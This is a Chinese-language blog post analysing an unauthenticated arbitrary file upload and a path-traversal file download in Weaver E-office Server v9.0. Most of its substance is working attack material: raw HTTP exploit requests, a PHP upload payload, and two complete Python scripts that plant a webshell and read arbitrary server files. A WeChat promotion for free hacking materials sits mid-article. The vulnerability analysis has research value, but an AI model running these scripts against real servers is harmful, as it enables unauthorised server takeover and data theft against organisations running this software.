E-office Server_v9.0 漏洞分析

于 2022-09-28 10:29:22 发布
阅读量740 收藏
点赞数
分类专栏: 漏洞挖掘 经验分享 网络安全 文章标签: 漏洞分析 e-office 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38154820/article/details/127084482
版权

漏洞简介

泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包,读取服务器上的任意文件

漏洞影响范围 E-office Server_v9.0

默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘,所以安装位置是 c:\eoffice

安装完成后,服务默认在 8082 端口 通过主机名 或 ip 地址都可以访问到

在这里插入图片描述

代码位置在 C:\eoffice\webroot 同样代码也是被加密了的

通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/

在这里插入图片描述

利用工具进行批量的解密,因为工具点击一次只能进行一次解密,所以利用模拟点击的工具进行模拟点击 KeymouseGo

在这里插入图片描述

任意文件上传漏洞

漏洞利用

/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.0.21.14:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Length: 175

------WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Disposition: form-data; name="Filedata"; filename="1.php"

<?php phpinfo();?>
------WebKitFormBoundaryykJoMlQs3JMOsgi3--

在这里插入图片描述

上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php

在这里插入图片描述
【----帮助网安学习,以下所有学习资料免费领!加weix:yj009991,备注“ csdn ”获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

漏洞分析

漏洞的主要位于 general/index/UploadFile.php

在这里插入图片描述

通过 $_GET 方法获取的参数 m,调用 UploadFile 中的任意方法

我们选择其中的 uploadPicture 方法

在这里插入图片描述

没有对传入的文件进行过滤,如果传入一个 php 文件,命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"

利用脚本

import sys
import requests

def request_shell(url):
    targeturl = url + "/images/logo/logo-eoffice.php"
    response = requests.get(targeturl)
    if(response.status_code == 200):
        print("获取 shell 成功,shell地址为:"+targeturl)

def request_upload(url,data):
    targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
    targetfile = {'Filedata':('upload.php',data,'text/plain')}
    response = requests.post(url = targeturl, files = targetfile)
    if(response.status_code == 200):
        print("上传成功")
  
def read_uploadfile(url,filename):
    with open(filename) as f:
        data = f.read()
    request_upload(url,data)

def upload_file(url,filename):
    if (filename == "phpinfo.php"):
        data = "<?php phpinfo(); ?>"
        request_upload(url,data)
    else:
        read_uploadfile(url,filename)


def main():
    if len(sys.argv) < 3:
        print("Usage: upload_file.py targeturl filename\n"
              "Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php")
        exit()
    url = sys.argv[1]
    filename = sys.argv[2]
    upload_file(url,filename)
    request_shell(url)

if __name__ == '__main__':
    main()

任意文件下载漏洞

漏洞利用

GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1
Host: 10.0.21.14:8082
Origin: http://10.0.21.14:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


在这里插入图片描述

漏洞分析

inc/attach.php

在这里插入图片描述

直接传入参数 $path 最后会读取 $path 的内容并将结果返回出来,我们注意到利用未授权就可将文件下载下来,从代码层面并没有看出来原因,但是通过浏览器直接访问时无法访问到,进行了 302 跳转,通过 burpsuite 就可以访问到,攥写脚本禁止 302 跳转也可以读取出来。

漏洞的主要来源位于
在这里插入图片描述

我们看一下文件的下载链接

在这里插入图片描述
  ‍

利用脚本

import sys
import requests
import re

def save_reponse(re_result,filename):
    filename=re.findall("[^/]+$",filename)[0]
    # print(filename)
    with open(filename, 'w',encoding='gb18030') as f:
        f.write(re_result)

def re_response(response):
    re_result = response[1507:]
    return re_result


  

def read_file(url,filename):
    targeturl = url + "/inc/attach.php?path="+filename
    response = requests.get(url = targeturl, allow_redirects=False)
    # print(response.text)
    re_result = re_response(response.text)
    print(re_result)
    save_reponse(re_result,filename)

def main():
    if len(sys.argv) < 3:
        print("Usage: upload_file.py targeturl filename\n"
              "Example: python read_file.py http://10.0.21.14:8082 attach.php")
        exit()
    url = sys.argv[1]
    filename = sys.argv[2]
    read_file(url,filename)

if __name__ == '__main__':
    main()

在这里插入图片描述

还有一些 SQL 注入漏洞,还可以继续进一步的进行审计分析。

博客
MIPS栈溢出漏洞实战解析:从DVRF题目看ROP链构造
04-22 859
最近导师要搞IOT漏洞挖掘项目,我得找找IOT学习资料,DVRF就适合IOT设备漏洞挖掘从入门到入坟....
博客
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
03-27 492
Flowise存在严重的文件上传漏洞,尽管实施了上传校验机制,攻击者仍可通过特殊编码绕过限制,实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者能够上传恶意文件、脚本或SSH密钥,从而获取对托管服务器的远程控制权,对使用该平台构建AI代理的组织构成重大安全威胁。
博客
路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
03-18 558
D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令。
博客
ApoorvCTF Rust语言逆向实战
03-07 1200
上周参加了国外的ApoorvCTF比赛,看一下老外的比赛跟我们有什么不同,然后我根据国内比赛对比发现,他们考点还是很有意思的,反正都是逆向。
博客
给大模型通过RAG挂上知识库
02-28 1023
因为大模型的知识库存在于训练期间,因此对于一些最新发生的事或者是专业性问题可能会出现不准确或者是幻觉,因此可以使用RAG技术给大模型外挂知识库来达到精准回答的目的。
博客
安全测试中的js逆向实战
02-26 1752
对于常见的web或者h5的场景中,一些重要的系统都会对于参数或者敏感数据进行校验,防止被恶意篡改而利用。因此在安全测试过程中,对于一些越权、注入等测试,需要对参数值进行修改重放,那么这个过程是否能够成功第一步取决于是否可以搞定校验算法并成功绕过。因此本文主要介绍安全测试中常用的一些js逆向的技术手段。
博客
Mongoose 搜索注入漏洞分析
02-20 616
Mongoose 是一个用于 Node.js 的 MongoDB 对象建模工具,它使得与 MongoDB 数据库交互变得更加简单和高效。我们可以看到这两个漏洞描述大体相同,都是因为在使用 $where 运算符时出现了问题。
博客
pocsuite3安全工具源码分析
02-18 675
pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。为了更好理解其运行逻辑,本文将从源码角度分析该项目的初始化,多线程函数,poc模板等等源码。
博客
DedeBIZ系统审计小结
02-12 767
之前简单审计过DedeBIZ系统,网上还没有对这个系统的漏洞有过详尽的分析,于是重新审计并总结文章,记录下自己审计的过程。
博客
Apache Calcite Avatica 远程代码执行(CVE-2022-36364)
02-08 683
前段时间看到Apache Calcite Avatica远程代码执行漏洞 CVE-2022-36364 在网上搜索也没有找到相关的分析和复现文章,于是想着自己研究一下,看能不能发现可以利用的方法。
博客
从靶场到实战:双一流高校多个高危漏洞
01-24 1025
本文结合其它用户案例分析讲解挖掘某双一流站点的过程,包含日志泄露漏洞深入利用失败,到不弱的弱口令字典进入后台,再到最后偶遇一个貌似只在靶场遇到过的高危漏洞。
博客
三个月测一站之漏洞挖掘纯享版
01-17 873
好久前偶遇一个站点,前前后后大概挖了三个月才基本测试完毕,出了好多漏洞,也有不少高危,现在对部分高危漏洞进行总结分析。
博客
软件系统安全逆向分析-混淆对抗
01-09 1584
在一般的软件中,我们逆向分析时候通常都不能直接看到软件的明文源代码,或多或少存在着混淆对抗的操作。下面,我会实践操作一个例子,从无从下手到攻破目标。
博客
自己搭建专属AI:Llama大模型私有化部署
12-20 910
AI新时代,提高了生产力且能帮助用户快速解答问题,现在用的比较多的是Openai、Claude,为了保证个人隐私数据,所以尝试本地(Mac M3)搭建Llama模型进行沟通。
博客
海外的bug-hunters,不一样的403bypass
12-06 877
一种绕过403的新技术,跟大家分享一下。研究HTTP协议已经有一段时间了。发现HTTP协议的1.0版本可以绕过403。于是开始对lyncdiscover.microsoft.com域做FUZZ,并且发现了几个403Forbidden的文件。
博客
利用断开的域管理员RDP会话提权
12-05 604
当域内管理员登录过攻击者可控的域内普通机器运维或者排查结束后,退出3389时没有退出账号而是直接关掉了远程桌面,那么会产生哪些风险呢?有些读者第一个想到的肯定就是抓密码,但是如果抓不到明文密码又或者无法pth呢?
博客
Linux kernel 堆溢出利用方法(三)
11-26 1185
本文我们通过我们的老朋友heap_bof来讲解Linux kernel中任意地址申请的其中一种比赛比较常用的利用手法modprobe_path。再通过两道近期比赛的赛题来讲解。
博客
SIM Jacker攻击分析
11-15 1099
攻击者使用普通手机发送特殊构造的短信即可远程定位目标,危害较大。sim卡的使用在手机上的使用非常普遍,所以一旦SIM卡上出现什么问题就会造成非常大的影响。在19年的报告纰漏中,在全球估算共有10亿设备的sim卡容易遭受SIMJacker攻击,这篇也是比较浅显的对整个攻击进行分析。
博客
Linux kernel 堆溢出利用方法(二)
11-11 473
本文我们通过我们的老朋友heap_bof来讲解Linux kernel中off-by-null的利用手法。在通过讲解另一道相对来说比较困难的kernel off-by-null + docker escape来深入了解这种漏洞的利用手法。
博客
oasys系统代码审计
11-06 911
oasys是一个OA办公自动化系统,使用Maven进行项目管理,基于springboot框架开发的项目,mysql底层数据库,前端采用freemarker模板引擎,Bootstrap作为前端UI框架,集成了jpa、mybatis等框架。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值